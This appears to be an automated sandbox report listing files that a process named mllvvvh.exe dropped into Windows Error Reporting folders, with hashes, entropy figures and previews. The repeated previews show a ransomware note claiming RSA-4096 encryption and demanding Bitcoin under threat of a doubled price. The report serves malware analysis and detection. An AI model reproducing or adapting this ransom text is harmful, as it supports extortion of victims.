                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6232e\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6266a\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6266a\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6266a\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c62d40\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c62d40\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c62d40\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6305d\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6305d\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c6305d\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c634e1\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c634e1\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c634e1\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c637df\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c637df\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c637df\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63aad\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63aad\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63aad\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63faf\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63faf\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63faf\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64442\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64442\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64442\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c648c7\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
